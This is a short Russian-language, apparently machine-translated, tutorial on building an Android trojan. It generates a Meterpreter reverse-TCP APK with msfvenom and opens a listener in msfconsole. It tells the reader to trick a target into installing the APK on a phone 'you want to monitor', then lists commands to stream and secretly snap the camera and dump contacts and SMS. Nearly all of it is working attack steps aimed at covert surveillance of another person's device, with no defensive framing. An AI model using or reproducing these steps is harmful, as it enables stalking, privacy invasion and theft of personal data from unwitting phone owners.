Затем введите команду: msfvenom -p android/meterpreter/reverse_tcp LHOST=IP вашего Кали LPORT=5555 R > /root/apk.apk
Здесь указан порт 5555. Вы также можете изменить его самостоятельно. Это показывает, что это описание было успешно создано. Его размер составляет всего более 9 КБ.
Затем введите команду: msfconsole, чтобы запустить msfconsole. Процесс запуска займет некоторое время.
1. использовать эксплойт/мульти/обработчик //Загрузить модуль
2. установить полезную нагрузку android/meterpreter/reverse_tcp //Выбираем полезную нагрузку
3.show options //Просмотр настроек параметров
Здесь вам нужно установить IP-адрес LHOST, который является IP-адресом вашего Kali.
Существует также порт LPORT, который только что был установлен на 5555 и его необходимо изменить (также можно сразу установить его на 4444)
1.set LHOST 192.168.1.114 //Здесь установлен IP-адрес только что созданного нами трояна.
2.set LPORT 5555 //Здесь установлен порт, который мы только что сгенерировали для прослушивания трояном.
3.exploit //Начать реализацию уязвимости, начать мониторинг и дождаться подключения телефона к сети.
Далее вам нужно проявить изобретательность, чтобы установить этот APK на мобильный телефон, который вы хотите отслеживать.
Красное поле указывает на то, что телефон подключен к сети, и вы можете ввести sysinfo, чтобы просмотреть информацию о телефоне.
После включения камеры будут сгенерированы два файла, которые можно открыть двойным щелчком мыши.
webcam_list Проверьте количество камер в телефоне. Здесь показано 2.
webcam_stream // Включаем камеру
webcam_snap //Секретная функция камеры
dump_contacts //Экспорт номеров телефонов
dump_sms //Экспортировать информацию
Вы можете ввести ?, чтобы увидеть больше команд.